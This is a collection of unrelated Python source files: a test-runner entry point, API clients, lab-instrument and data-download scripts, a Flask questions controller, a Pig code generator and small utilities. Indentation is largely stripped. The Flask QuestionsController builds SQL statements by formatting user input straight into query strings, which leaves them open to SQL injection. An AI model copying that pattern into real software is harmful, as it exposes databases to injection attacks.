isolateserver.add_isolate_server_options(data_group)
parser.add_option_group(data_group)
isolateserver.add_cache_options(parser)
cipd.add_cipd_options(parser)
named_cache.add_named_cache_options(parser)
debug_group = optparse.OptionGroup(parser, 'Debugging')
debug_group.add_option(
'--leak-temp-dir',
action='store_true',
help='Deliberately leak isolate\'s temp dir for later examination. '
'Default: %default')
debug_group.add_option(
'--root-dir', help='Use a directory instead of a random one')
parser.add_option_group(debug_group)
auth.add_auth_options(parser)
parser.set_defaults(
cache='cache',
cipd_cache='cipd_cache',
named_cache_root='named_caches')
return parser
def parse_args(args):
# Create a fake mini-parser just to get out the "-a" command. Note that
# it's not documented here; instead, it's documented in create_option_parser
# even though that parser will never actually get to parse it. This is
# because --argsfile is exclusive with all other options and arguments.
file_argparse = argparse.ArgumentParser(add_help=False)
file_argparse.add_argument('-a', '--argsfile')
(file_args, nonfile_args) = file_argparse.parse_known_args(args)
if file_args.argsfile:
if nonfile_args:
      file_argparse.error('Can\'t specify --argsfile with '
'any other arguments (%s)' % nonfile_args)
try:
with open(file_args.argsfile, 'r') as f:
args = json.load(f)
except (IOError, OSError, ValueError) as e:
# We don't need to error out here - "args" is now empty,
# so the call below to parser.parse_args(args) will fail
# and print the full help text.
print >> sys.stderr, 'Couldn\'t read arguments: %s' % e
# Even if we failed to read the args, just call the normal parser now since it
# will print the correct help message.
parser = create_option_parser()
options, args = parser.parse_args(args)
return (parser, options, args)
def main(args):
(parser, options, args) = parse_args(args)
isolate_cache = isolateserver.process_cache_options(options, trim=False)
named_cache_manager = named_cache.process_named_cache_options(parser, options)
if options.clean:
if options.isolated:
parser.error('Can\'t use --isolated with --clean.')
if options.isolate_server:
parser.error('Can\'t use --isolate-server with --clean.')
if options.json:
parser.error('Can\'t use --json with --clean.')
if options.named_caches:
      parser.error('Can\'t use --named-cache with --clean.')
clean_caches(options, isolate_cache, named_cache_manager)
return 0
if not options.no_clean:
clean_caches(options, isolate_cache, named_cache_manager)
if not options.isolated and not args:
parser.error('--isolated or command to run is required.')
auth.process_auth_options(parser, options)
isolateserver.process_isolate_server_options(
parser, options, True, False)
if not options.isolate_server:
if options.isolated:
parser.error('--isolated requires --isolate-server')
if ISOLATED_OUTDIR_PARAMETER in args:
parser.error(
'%s in args requires --isolate-server' % ISOLATED_OUTDIR_PARAMETER)
if options.root_dir:
options.root_dir = unicode(os.path.abspath(options.root_dir))
if options.json:
options.json = unicode(os.path.abspath(options.json))
cipd.validate_cipd_options(parser, options)
install_packages_fn = noop_install_packages
if options.cipd_enabled:
install_packages_fn = lambda run_dir: install_client_and_packages(
run_dir, cipd.parse_package_args(options.cipd_packages),
options.cipd_server, options.cipd_client_package,
options.cipd_client_version, cache_dir=options.cipd_cache)
@contextlib.contextmanager
def install_named_caches(run_dir):
# WARNING: this function depends on "options" variable defined in the outer
# function.
caches = [
(os.path.join(run_dir, unicode(relpath)), name)
for name, relpath in options.named_caches
]
with named_cache_manager.open():
for path, name in caches:
named_cache_manager.install(path, name)
try:
yield
finally:
with named_cache_manager.open():
for path, name in caches:
named_cache_manager.uninstall(path, name)
try:
if options.isolate_server:
storage = isolateserver.get_storage(
options.isolate_server, options.namespace)
with storage:
# Hashing schemes used by |storage| and |isolate_cache| MUST match.
assert storage.hash_algo == isolate_cache.hash_algo
return run_tha_test(
args,
options.isolated,
storage,
isolate_cache,
options.output,
install_named_caches,
options.leak_temp_dir,
options.json, options.root_dir,
options.hard_timeout,
options.grace_period,
options.bot_file,
install_packages_fn,
options.use_symlinks)
return run_tha_test(
args,
options.isolated,
None,
isolate_cache,
options.output,
install_named_caches,
options.leak_temp_dir,
options.json,
options.root_dir,
options.hard_timeout,
options.grace_period,
options.bot_file,
install_packages_fn,
options.use_symlinks)
except (cipd.Error, named_cache.Error) as ex:
print >> sys.stderr, ex.message
return 1
if __name__ == '__main__':
subprocess42.inhibit_os_error_reporting()
# Ensure that we are always running with the correct encoding.
fix_encoding.fix_encoding()
file_path.enable_symlink()
sys.exit(main(sys.argv[1:]))
|
from adminapi import _api_settings
from adminapi.request import send_request
API_CALL_ENDPOINT = '/call'
class ApiError(Exception):
pass
class ExceptionManager(object):
def __init__(self):
self._cache = {}
def __getattr__(self, attr):
if attr == 'ApiError':
return ApiError
if attr not in self._cache:
exc = type(attr, (ApiError, ), {})
self._cache[attr] = exc
return self._cache[attr]
class FunctionGroup(object):
def __init__(self, group, auth_token, timeout):
self.group = group
self.auth_token = auth_token
self.timeout = timeout
def __getattr__(self, attr):
def _api_function(*args, **kwargs):
call = {
'group': self.group,
'name': attr,
'args': args,
'kwargs': kwargs,
}
if hasattr(self.auth_token, '__call__'):
self.auth_token = self.auth_token()
result = send_request(API_CALL_ENDPOINT, call, self.auth_token,
self.timeout)
if result['status'] == 'success':
return result['retval']
if result['status'] == 'error':
if result['type'] == 'ValueError':
exception_class = ValueError
elif result['type'] == 'TypeError':
exception_class = TypeError
else:
exception_class = getattr(
ExceptionManager(), result['type']
)
#
# Dear traceback reader,
#
# This is not the location of the exception, please read the
# exception message and figure out what's wrong with your
# code.
#
raise exception_class(result['message'])
return _api_function
def get(group):
# We allow delaying the authentication
if _api_settings['auth_token'] is None:
token = (lambda: _api_settings['auth_token'])
else:
token = _api_settings['auth_token']
return FunctionGroup(group, token, _api_settings['timeout_api'])
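# Minimal usage sketch (assuming this module is importable as `adminapi.api`;
# the group and function names below are hypothetical and resolved remotely):
#
#   from adminapi import api
#   dataset = api.get('dataset')
#   result = dataset.some_function(1, 2, key='value')
#
# On an 'error' response the call raises ValueError, TypeError, or a
# dynamically created ApiError subclass named after the remote exception type.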
|
# Import packages needed:
import visa
import numpy as np
import sys
import warnings
import time
import matplotlib.pyplot as plt
import multiprocessing as multi
import os
import pandas as pd
# Import our classes
from sr_operators import *
from adv_op import *
import measure
import maths_op
from Setup import *
import saving
banner= """\
___ _ ___ _ _
/ __|___ ___ _ _ __ _ ___ __ _ _ _ __| | | _ \__ _| |__| |___ ___
| (_ / -_) _ \ '_/ _` / -_) / _` | ' \/ _` | | _/ _` | '_ \ / _ (_-<
\___\___\___/_| \__, \___| \__,_|_||_\__,_| |_| \__,_|_.__/_\___/__/
|___/
___ _
/ __|___ __| |___
| (__/ _ \/ _` / -_)
\___\___/\__,_\___|
###################################################################################
"""
os.system("clear")
print (banner)
#Set up the Lock-in Amplifier
rm =visa.ResourceManager()
print("Looking for the Sr830 DSP Lock-In Amplifier")
try:
i=0
while True:
sr830 = rm.open_resource(str(rm.list_resources()[i]))
i+=1
if 'Stanford_Research_Systems,' in sr830.query('*IDN?'):
print('\nSr830 DSP Lock-In Amplifier found.')
break
except:
warnings.warn('No Sr830 DSP Lock-In Amplifier found.')
sys.exit(0)
try:
i=0
while True:
source = rm.open_resource(str(rm.list_resources()[i]))
i+=1
if 'Agilent Technologies' in source.query('*IDN?'):
print('\nAgilent waveform generator found\n\nStarting measurements...')
break
except:
    warnings.warn('No Agilent waveform generator found.')
sys.exit(0)
os.system("mkdir results")
os.system("mkdir results/data")
os.system("mkdir results/Plots/")
os.system("clear")
print(banner)
try:
parameters = setup()
measure.data_V_I(sr830, source, parameters)
except KeyboardInterrupt:
sr830.clear()
os.system("clear")
print(banner)
print("Script exited by user")
saving.Latex()
os.system("clear")
sr830.clear()
|
# This notebook fragment assumes earlier cells defined `x`, `y`, `max_order`,
# `theta_hats`, and `make_design_matrix`; only the imports are added here.
import numpy as np
import matplotlib.pyplot as plt

mse = np.zeros((max_order + 1))
for order in range(0, max_order + 1):
X_design = make_design_matrix(x, order)
# Get prediction for the polynomial regression model of this order
y_hat = X_design @ theta_hats[order]
# Compute the residuals
residuals = y - y_hat
# Compute the MSE
mse[order] = np.mean(residuals ** 2)
with plt.xkcd():
fig, ax = plt.subplots()
ax.bar(range(max_order + 1), mse);
ax.set(title='Comparing Polynomial Fits', xlabel='Polynomial order', ylabel='MSE')
|
"""With this script users can download the final HTML dataset from Internet Archive.
This is a script for downloading the whole HTML dataset, which is
hosted on Internet Archive. Note that the whole dataset is 7TB
compressed. If the script fails during execution, it can be
safely restarted. The internetarchive library doesn't re-download files
that have already been successfully downloaded.
Example
-------
python download_whole_dataset.py
"""
import os
from internetarchive import download
with open("file_names.txt") as f:
file_names = f.readlines()
file_names = [x.strip() for x in file_names]
print("Starting the download process, this may take a while...")
for ia_item in file_names:
if ia_item != "enwiki-20190301-original-full-history-dump_dlab":
ia_item = ia_item + "_html_dlab"
flag = download(ia_item)
if flag == False:
print("Error occurred while downloading the data! Please rerun the script.")
exit(1)
print("The download process finished successfully!")
|
from flask_jwt_extended import get_jwt_identity
from datetime import datetime
from src.users.controller import conn, cur
class QuestionsController:
"""Question controller interfaces with the database."""
def __init__(self):
"""Initializes the questions controller class."""
conn.create_questions_table()
@staticmethod
def create_question(data):
"""Creates a question."""
question_author = get_jwt_identity()['username']
sql = """INSERT INTO questions(question_title, question_author, question_body)
VALUES ('{}', '{}','{}')"""
sql_command = sql.format(data['question_title'],
question_author,
data['question_body'])
cur.execute(sql_command)
@staticmethod
def delete_question(question_id):
''' Deletes a question '''
sql = """ DELETE FROM questions WHERE question_id ='{}'"""
sql_command = sql.format(question_id)
cur.execute(sql_command)
@staticmethod
def query_question(question_id):
''' selects a question from database '''
sql = """ SELECT * FROM questions WHERE question_id ='{}' """
sql_command = sql.format(question_id)
cur.execute(sql_command)
row = cur.fetchone()
return row
@staticmethod
def update_question(data, question_id):
"""Updates a question."""
sql = """UPDATE questions SET question_title='{}',\
question_body='{}' ,updated_at='{}' WHERE question_id='{}'"""
sql_command = sql.format(data['question_title'], data['question_body'],
datetime.now(), question_id)
cur.execute(sql_command)
sql = """ SELECT * FROM questions WHERE question_id ='{}' """
sql_command = sql.format(question_id)
cur.execute(sql_command)
row = cur.fetchone()
if row:
return row
@staticmethod
def query_all_questions():
''' selects all available questions from the database '''
sql = """ SELECT * FROM questions """
cur.execute(sql)
rows = cur.fetchall()
return rows
@staticmethod
def check_question_author(question_id):
"""return checks author for authorization purposes"""
username = get_jwt_identity()['username']
sql = """SELECT question_author FROM questions WHERE question_id='{}'"""
cur.execute(sql.format(question_id))
row = cur.fetchone()
if row and row[0] == username:
return True
else:
return False
|
"""
Copyright (c) 2020 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
import logging
import sys
import os
from detector.tools.trend.detect import Detector
m_logger = logging.getLogger('detector')
class Forecaster:
"""
    This class is used for forecasting future trends of a timeseries, based on
    a timeseries forecasting algorithm.
"""
def __init__(self, *args, **kwargs):
self.minimum_timeseries_length = 4
self.database_dir = kwargs['database_dir']
self.forecast_alg = kwargs['forecast_alg']
self.data_period = kwargs['data_period']
self.interval = kwargs['interval']
self.period = kwargs['period']
self.freq = kwargs['freq']
self.data_handler = kwargs['data_handler']
self.trend_service_list = kwargs['trend_service_list']
self.forecast_handler = kwargs['forecast_handler']
self.metric_config = kwargs['metric_config']
def run(self):
for database in os.listdir(self.database_dir):
with self.data_handler(os.path.join(self.database_dir, database)) as db:
if 'journal' in database:
continue
try:
tables = db.get_all_tables()
last_timestamp = None
for table in self.trend_service_list:
if table not in tables:
m_logger.warning("Table {table} is not in {database}.".format(table=table, database=database))
continue
fields = db.get_all_fields(table)
if not last_timestamp:
last_timestamp = db.get_latest_timestamp(table)
for field in fields:
forecast_result = {}
timeseries = db.get_timeseries(table=table, field=field, period=self.data_period,
timestamp=last_timestamp)
if not timeseries:
m_logger.error("Can not get time series from {table}-{field} by period '{period}', "
"skipping forecast.".format(table=table, field=field,
period=self.data_period))
forecast_result['status'] = 'fail'
continue
if len(timeseries) < self.minimum_timeseries_length:
m_logger.error(
"The length of time series in {table}-{field} is too short: [{ts_length}], "
"so you can adjust 'data_period'.".format(table=table, field=field,
ts_length=len(timeseries)))
continue
self.forecast_handler.fit(timeseries)
date, value = self.forecast_handler.forecast(period=self.period, freq=self.freq)
try:
minimum = None if not self.metric_config.has_option(
table, field + '_minimum') else self.metric_config.getfloat(
table, field + '_minimum')
maximum = None if not self.metric_config.has_option(
table, field + '_maximum') else self.metric_config.getfloat(
table, field + '_maximum')
except Exception as e:
m_logger.error("{table} - {field}: {err}".format(table=table, field=field, err=str(e)))
continue
if minimum is None and maximum is None:
m_logger.error("{table} - {field}: The minimum and maximum is not provided, you should at least provide one of it.".format(table=table, field=field))
continue
if minimum is not None and maximum is not None and minimum > maximum:
m_logger.error("{table} - {field}: The minimum is greater than the maximum.".format(table=table, field=field))
continue
detect_basis = {'minimum': minimum, 'maximum': maximum}
forecast_result['status'] = 'success'
forecast_result['metric_name'] = table + '-->' + field
forecast_result['detect_basis'] = detect_basis
forecast_result['future_date'] = date
forecast_result['future_value'] = value
Detector.detect(forecast_result)
except Exception as e:
m_logger.error(str(e), exc_info=True)
sys.exit(-1)
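# Construction sketch (every value below is a placeholder; the real handler,
# service list and config objects are supplied by the surrounding detector
# service):
#
#   forecaster = Forecaster(
#       database_dir='./data',                 # one database file per instance
#       forecast_alg='auto_arima',             # hypothetical algorithm name
#       data_period='7d', interval='10m', period=5, freq='10m',
#       data_handler=SQLiteHandler,            # context-manager data access class
#       trend_service_list=['os_exporter'],
#       forecast_handler=forecast_model,       # object exposing fit()/forecast()
#       metric_config=metric_config_parser)    # ConfigParser with *_minimum/_maximum
#   forecaster.run()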
|
class ArbitrageConfig(object):
def __init__(self, options={}):
self.name = options['name']
self.base_coin = options['base_coin']
self.quote_coin = options['quote_coin']
self.symbol = f"{self.base_coin}/{self.quote_coin}"
        self.one_to_two_pure_profit_limit = float(options['one_to_two_pure_profit_limit'])  # net-profit threshold for buying low on exchange1 and selling high on exchange2, e.g. 5%
        self.two_to_one_pure_profit_limit = float(options['two_to_one_pure_profit_limit'])  # net-profit threshold for buying low on exchange2 and selling high on exchange1, e.g. 5%
        self.min_buy_num_limit_by_quote = options['min_buy_num_limit_by_quote']  # minimum trade size; some markets reject orders below this amount
if self.min_buy_num_limit_by_quote is not None:
self.min_buy_num_limit_by_quote = float(self.min_buy_num_limit_by_quote)
        self.max_buy_num_limit_by_quote = options['max_buy_num_limit_by_quote']  # maximum trade size, to limit losses if one leg of the trade fails
if self.max_buy_num_limit_by_quote is not None:
self.max_buy_num_limit_by_quote = float(self.max_buy_num_limit_by_quote)
        self.max_open_order_limit = float(options['max_open_order_limit'])  # limit on concurrently open orders, to avoid piling up abnormal orders
        self.base_coin_num = float(options['base_coin_num'])  # amount of base coin used for profit calculation; with small amounts transfer fees take a large share
        self.quote_coin_num = float(options['quote_coin_num'])  # amount of quote coin
self.exchange1_api_key = options['exchange1_api_key'] # api key
self.exchange1_secret = options['exchange1_secret']
self.exchange1_password = options.get('exchange1_password', None)
self.exchange1_new_ws = options.get('exchange1_new_ws', None)
self.exchange2_api_key = options['exchange2_api_key']
self.exchange2_secret = options['exchange2_secret']
self.exchange2_password = options.get('exchange2_password', None)
self.exchange2_new_ws = options.get('exchange2_new_ws', None)
self.exchange1_id = options['exchange1_id']
self.exchange2_id = options['exchange2_id']
        self.exchange1_taker_fee = float(options['exchange1_taker_fee'])  # taker fee on exchange 1, e.g. 1%
self.exchange2_taker_fee = float(options['exchange2_taker_fee'])
        self.exchange1_withdraw_base_fee = float(options['exchange1_withdraw_base_fee'])  # withdrawal fee estimated as a flat amount rather than a percentage
self.exchange1_withdraw_quote_fee = float(options['exchange1_withdraw_quote_fee'])
self.exchange2_withdraw_base_fee = float(options['exchange2_withdraw_base_fee'])
self.exchange2_withdraw_quote_fee = float(options['exchange2_withdraw_quote_fee'])
        self.base_coin_alert_num = float(options['base_coin_alert_num'])  # base coin balance alert threshold; alert when the balance drops below this
self.quote_coin_alert_num = float(options['quote_coin_alert_num'])
        self.bisect_coin = options['bisect_coin']  # when computing profit, whether coins are assumed to be split evenly across the two markets or held in one; set to False if the market is usually one-sided
        self.enable_transfer = options['enable_transfer']  # if transfers are disabled, withdrawal fees are not counted by default; suitable when the two markets have premiums in both directions or transfer fees are too high
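# Minimal options sketch (all values are placeholders, not recommendations):
#
#   config = ArbitrageConfig({
#       'name': 'btc_usdt_arb',
#       'base_coin': 'BTC', 'quote_coin': 'USDT',
#       'one_to_two_pure_profit_limit': '0.005',
#       'two_to_one_pure_profit_limit': '0.005',
#       'min_buy_num_limit_by_quote': None,
#       'max_buy_num_limit_by_quote': '0.1',
#       'max_open_order_limit': '5',
#       'base_coin_num': '0.2', 'quote_coin_num': '2000',
#       'exchange1_api_key': 'KEY1', 'exchange1_secret': 'SECRET1',
#       'exchange2_api_key': 'KEY2', 'exchange2_secret': 'SECRET2',
#       'exchange1_id': 'exchangeA', 'exchange2_id': 'exchangeB',
#       'exchange1_taker_fee': '0.001', 'exchange2_taker_fee': '0.002',
#       'exchange1_withdraw_base_fee': '0.0005', 'exchange1_withdraw_quote_fee': '1',
#       'exchange2_withdraw_base_fee': '0.0005', 'exchange2_withdraw_quote_fee': '1',
#       'base_coin_alert_num': '0.05', 'quote_coin_alert_num': '200',
#       'bisect_coin': True, 'enable_transfer': False,
#   })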
|
__author__ = 'Bohdan Mushkevych'
from io import TextIOWrapper
from typing import Union
from grammar.sdplParser import sdplParser
from parser.abstract_lexicon import AbstractLexicon
from parser.data_store import DataStore
from parser.projection import RelationProjection, FieldProjection, ComputableField
from schema.sdpl_schema import Schema, Field, MIN_VERSION_NUMBER, DataType, Compression
class PigLexicon(AbstractLexicon):
def __init__(self, output_stream: TextIOWrapper) -> None:
super(PigLexicon, self).__init__(output_stream)
def _jdbc_datasink(self, data_sink: DataStore):
field_names = [f.name for f in data_sink.relation.schema.fields]
values = ['?' for _ in range(len(field_names))]
out = "REGISTER /var/lib/sdpl/postgresql-42.0.0.jar;\n"
out += "REGISTER /var/lib/sdpl/piggybank-0.16.0.jar;\n"
out += "STORE {0} INTO 'hdfs:///unused-ignore' ".format(data_sink.relation.name)
out += "USING org.apache.pig.piggybank.storage.DBStorage(\n"
out += " 'org.postgresql.Driver',\n"
out += " 'jdbc:postgresql://{0}:{1}/{2}',\n".format(data_sink.data_repository.host,
data_sink.data_repository.port,
data_sink.data_repository.db)
out += " '{0}', '{1}',\n".format(data_sink.data_repository.user, data_sink.data_repository.password)
out += " 'INSERT INTO {0} ({1}) VALUES ({2})'\n".format(data_sink.table_name,
','.join(field_names), ','.join(values))
out += ');'
return out
def _file_datasink(self, data_sink: DataStore):
if data_sink.data_repository.data_type == DataType.CSV.name:
store_function = "PigStorage(',')"
elif data_sink.data_repository.data_type == DataType.TSV.name:
store_function = "PigStorage()"
elif data_sink.data_repository.data_type == DataType.BIN.name:
store_function = "BinStorage()"
elif data_sink.data_repository.data_type == DataType.JSON.name:
store_function = "JsonStorage()"
elif data_sink.data_repository.data_type == DataType.ORC.name:
is_snappy = data_sink.data_repository.compression == Compression.SNAPPY.name
store_function = "OrcStorage('-c SNAPPY')" if is_snappy else "OrcStorage()"
else:
store_function = "PigStorage()"
if not data_sink.data_repository.host:
# local file system
fqfp = '/{0}/{1}'.format(data_sink.data_repository.db.strip('/'),
data_sink.table_name)
else:
# distributed file system
fqfp = '{0}:{1}/{2}/{3}'.format(data_sink.data_repository.host.strip('/'),
data_sink.data_repository.port,
data_sink.data_repository.db.strip('/'),
data_sink.table_name)
store_string = "STORE {0} INTO '{1}' USING {2} ;".format(data_sink.relation.name, fqfp, store_function)
return store_string
def _jdbc_datasource(self, data_source: DataStore):
raise NotImplementedError('pig_schema._jdbc_datasource is not supported')
def _file_datasource(self, data_source: DataStore):
if data_source.data_repository.data_type == DataType.CSV.name:
load_function = "PigStorage(',')"
elif data_source.data_repository.data_type == DataType.TSV.name:
load_function = "PigStorage()"
elif data_source.data_repository.data_type == DataType.BIN.name:
load_function = "BinStorage()"
elif data_source.data_repository.data_type == DataType.JSON.name:
load_function = "JsonLoader()"
elif data_source.data_repository.data_type == DataType.ORC.name:
is_snappy = data_source.data_repository.compression == Compression.SNAPPY.name
load_function = "OrcStorage('-c SNAPPY')" if is_snappy else "OrcStorage()"
else:
load_function = "PigStorage()"
if not data_source.data_repository.host:
# local file system
fqfp = '/{0}/{1}'.format(data_source.data_repository.db.strip('/'),
data_source.table_name)
else:
# distributed file system
fqfp = '{0}:{1}/{2}/{3}'.format(data_source.data_repository.host.strip('/'),
data_source.data_repository.port,
data_source.data_repository.db.strip('/'),
data_source.table_name)
load_string = "LOAD '{0}' USING {1} AS ({2})".\
format(fqfp, load_function, self.parse_schema(data_source.relation.schema))
return load_string
@classmethod
def comment_delimiter(cls):
return '--'
def parse_datasource(self, data_source: DataStore):
if data_source.data_repository.is_file_type:
return self._file_datasource(data_source)
else:
return self._jdbc_datasource(data_source)
def parse_datasink(self, data_sink: DataStore):
if data_sink.data_repository.is_file_type:
return self._file_datasink(data_sink)
else:
return self._jdbc_datasink(data_sink)
def parse_field(self, field: Field):
out = '{0}:{1}'.format(field.name, field.field_type)
return out
def parse_field_projection(self, field: Union[FieldProjection, ComputableField]):
if isinstance(field, ComputableField):
return '{0} AS {1}'.format(field.expression, field.field_name)
elif isinstance(field, FieldProjection):
return '{0}.{1} AS {2}'.format(field.schema_name, field.field_name, field.as_field_name)
else:
raise TypeError('Unsupported type for field projection: {0}'.format(type(field)))
def parse_schema(self, schema: Schema, max_version=MIN_VERSION_NUMBER):
filtered_fields = [f for f in schema.fields if f.version <= max_version]
out = ',\n '.join([self.parse_field(field) for field in filtered_fields])
out = '\n ' + out + '\n'
return out
def parse_operand(self, ctx: sdplParser.OperandContext):
# SDPL operand semantics are the same as in Pig
return ctx.getText()
def parse_filter_terminal_node(self, element: str) -> tuple:
        # SDPL terminal nodes are "AND" and "OR", and they behave the same as in Pig
return element, None
def emit_udf_registration(self, udf_fqfp: str, udf_alias:str):
out = 'REGISTER {0}'.format(udf_fqfp)
out += ' AS {0};'.format(udf_alias) if udf_alias else ';'
self._out(out)
def emit_releation_decl(self, relation_name: str, data_source: DataStore):
self._out("{0} = {1};".format(relation_name, self.parse_datasource(data_source)))
def emit_schema_projection(self, left_relation_name: str, right_relation_name: str, output_fields: list):
""" method iterates over the projection and emits FOREACH ... GENERATE code
NOTICE: computable fields are placed at the tail of the GENERATE block """
self._out('{0} = FOREACH {1} GENERATE'.format(left_relation_name, right_relation_name))
output = ',\n '.join([self.parse_field_projection(f) for f in output_fields])
self._out(' ' + output)
self._out(';')
def emit_join(self, relation_name: str, column_names: list, projection: RelationProjection) -> None:
"""
:param relation_name: name of joined relation
:param column_names: list in format [(relation_name, column_name), ..., (relation_name, column_name)]
:param projection:
:return: None
"""
# step 0: reformat list [(relation_name, column_name), ..., (relation_name, column_name)] into
# dict {relation_name: [column_name, ..., column_name]}
join_elements = self.column_list_to_dict(column_names)
# step 1: Generate JOIN name as JOIN_SA_SB_..._SZ
join_name = 'JOIN'
join_body = ''
for element_name, join_columns in join_elements.items():
join_name += '_' + element_name.upper()
if not join_body:
# this is the first cycle of the loop
join_body = 'JOIN {0} BY '.format(element_name)
else:
join_body += ', {0} BY '.format(element_name)
# format output so it contains relation name: a -> A.a
join_columns = ['{0}.{1}'.format(element_name, column_name) for column_name in join_columns]
join_body += '(' + ','.join(join_columns) + ')'
self._out('{0} = {1} ;'.format(join_name, join_body))
# step 2: expand schema with FOREACH ... GENERATE
output_fields = projection.fields + projection.computable_fields
self.emit_schema_projection(relation_name, join_name, output_fields)
def emit_filterby(self, relation_name: str, source_relation_name: str, filter_exp: str) -> None:
self._out('{0} = FILTER {1} BY {2} ;'.format(relation_name, source_relation_name, filter_exp))
def emit_orderby(self, relation_name: str, source_relation_name: str, column_names: list) -> None:
# ID = ORDER ID BY relationColumn (, relationColumn)* ;
by_clause = ['{0}.{1}'.format(*entry) for entry in column_names]
out = ', '.join(by_clause)
self._out('{0} = ORDER {1} BY {2} ;'.format(relation_name, source_relation_name, out))
def emit_groupby(self, relation_name: str, source_relation_name: str, column_names: list):
        # ID = GROUP ID BY relationColumn (, relationColumn)* ;
by_clause = ['{0}.{1}'.format(*entry) for entry in column_names]
out = ', '.join(by_clause)
self._out('{0} = GROUP {1} BY {2} ;'.format(relation_name, source_relation_name, out))
|
"""Module with utitlity functions."""
import json
import numpy as np
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if np.issubdtype(type(obj), np.integer):
return int(obj)
if np.issubdtype(type(obj), np.floating):
return float(obj)
return json.JSONEncoder.default(self, obj)
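# Minimal usage sketch: json.dumps cannot serialize numpy types on its own, so
# pass the encoder above via `cls` (the example values are arbitrary).
if __name__ == "__main__":
    payload = {"vector": np.arange(3), "count": np.int64(7), "score": np.float32(0.5)}
    print(json.dumps(payload, cls=NumpyEncoder))
    # -> {"vector": [0, 1, 2], "count": 7, "score": 0.5}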
|
import os
from pathlib import Path
from pelican import signals
# Function extracted from https://stackoverflow.com/a/19308592/7690767
# The three functions below provide all of the plugin's functionality
def get_filepaths(directory, extensions=[], ignores=[]):  # ignores is a list of file names that should be skipped
file_paths = [] # List which will store all of the full filepaths.
exts = extensions
if isinstance(extensions, str):
exts = [extensions]
igns = ignores
if isinstance(ignores, str):
igns = [ignores]
    # Walk the tree recursively
for root, directories, files in os.walk(directory):
for filename in files:
if filename in igns or not any(filename.endswith(f".{ext}") for ext in exts):
continue
filepath = Path(root, filename)
file_paths.append(filepath)
return file_paths
# Takes two arguments: the destination file and the list of source files to concatenate.
def create_bundle(files, output):
    with open(output, 'w') as outfile:  # open the destination file, overwriting it if it exists or creating it otherwise
for fname in files:
            with open(fname) as infile:  # for each of the source files
                outfile.write('\n\n')  # two blank lines between files
for line in infile:
outfile.write(line)
# Function subscribed to the Pelican signal
def create_bundles(sender):
    theme_path = sender.settings.get('THEME', None)  # read the setting that holds the theme path
    if theme_path is None:  # expected not to be None; otherwise stop here
return
    # Build independent bundles: one for the site's behaviour (JS) and one for its styling (CSS)
    js_bundle = f'{theme_path}/static/js/scripts_bundled.js'  # destination file
    js_filenames = get_filepaths(theme_path, 'js', "scripts_bundled.js")  # collect the paths of all JavaScript files
    create_bundle(js_filenames, js_bundle)  # concatenate and overwrite
    css_bundle = f'{theme_path}/static/css/style_bundled.css'  # destination file
    css_filenames = get_filepaths(theme_path, 'css', "style_bundled.css")  # collect the paths of all CSS files
create_bundle(css_filenames, css_bundle)
# Subscribe to Pelican's `initialized` signal; the CSS and JavaScript files are bundled there, although this could really be done at the start or at the end
def register():
signals.initialized.connect(create_bundles)
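# Standalone sketch of the two helpers above using a throwaway directory (file
# names are arbitrary). To activate the plugin itself, the module would typically
# be placed under PLUGIN_PATHS and listed in PLUGINS in pelicanconf.py.
if __name__ == "__main__":
    import tempfile
    tmp = Path(tempfile.mkdtemp())
    (tmp / "a.js").write_text("console.log('a');")
    (tmp / "b.js").write_text("console.log('b');")
    bundle = tmp / "bundle.js"
    create_bundle(get_filepaths(tmp, "js", "bundle.js"), bundle)
    print(bundle.read_text())  # both files concatenated, separated by blank lines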
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
''' Copyright 2012 Smartling, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this work except in compliance with the License.
* You may obtain a copy of the License in the LICENSE file, or at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
'''
import os
import sys
lib_path = os.path.abspath('../')
sys.path.append(lib_path) # allow to import ../smartlingApiSdk/SmartlingFileApi
from smartlingApiSdk.SmartlingFileApiV2 import SmartlingFileApiV2
from smartlingApiSdk.ProxySettings import ProxySettings
from smartlingApiSdk.SmartlingDirective import SmartlingDirective
from smartlingApiSdk.Credentials import Credentials
class SmartlingApiExample:
def __init__(self, file_name, file_type, new_name):
        credentials = Credentials()  # gets your Smartling credentials from environment variables
self.MY_USER_IDENTIFIER = credentials.MY_USER_IDENTIFIER
self.MY_USER_SECRET = credentials.MY_USER_SECRET
self.MY_PROJECT_ID = credentials.MY_PROJECT_ID
self.MY_LOCALE = credentials.MY_LOCALE
useProxy = False
if useProxy :
proxySettings = ProxySettings("login", "password", "proxy_host", "proxy_port")
else:
proxySettings = None
self.fapi = SmartlingFileApiV2( self.MY_USER_IDENTIFIER, self.MY_USER_SECRET, self.MY_PROJECT_ID, proxySettings)
self.file_type = file_type
self.file_name = file_name
self.new_name = new_name
def printMarker(self, caption):
print "--" + caption + "-" * 40
def test_import(self, name_to_import):
""" this method tests `import` command """
self.printMarker("file upload")
        # upload the file first so that its translations can be uploaded later
path = FILE_PATH + self.file_name
resp, code = self.fapi.upload(path, self.file_type)
        if 200 != code:
            raise Exception("failed")
print resp, code
self.printMarker("files list")
#list all files to ensure upload worked
resp, code = self.fapi.list()
print resp, code
self.printMarker("importing uploaded")
#set correct uri/name for file to be imported
path_to_import = FILE_PATH + name_to_import
#import translations from file
resp, code = self.fapi.import_call(path, path_to_import,
self.file_type, self.MY_LOCALE,
translationState="PUBLISHED")
print resp, code
        if 200 != code:
            raise Exception("failed")
#perform `last_modified` command
self.printMarker("last modified")
resp, code = self.fapi.last_modified(path, self.MY_LOCALE)
print "resp.code=", resp.code
print "resp.data", resp.data
self.printMarker("delete from server goes here")
#delete test file imported in the beginning of test
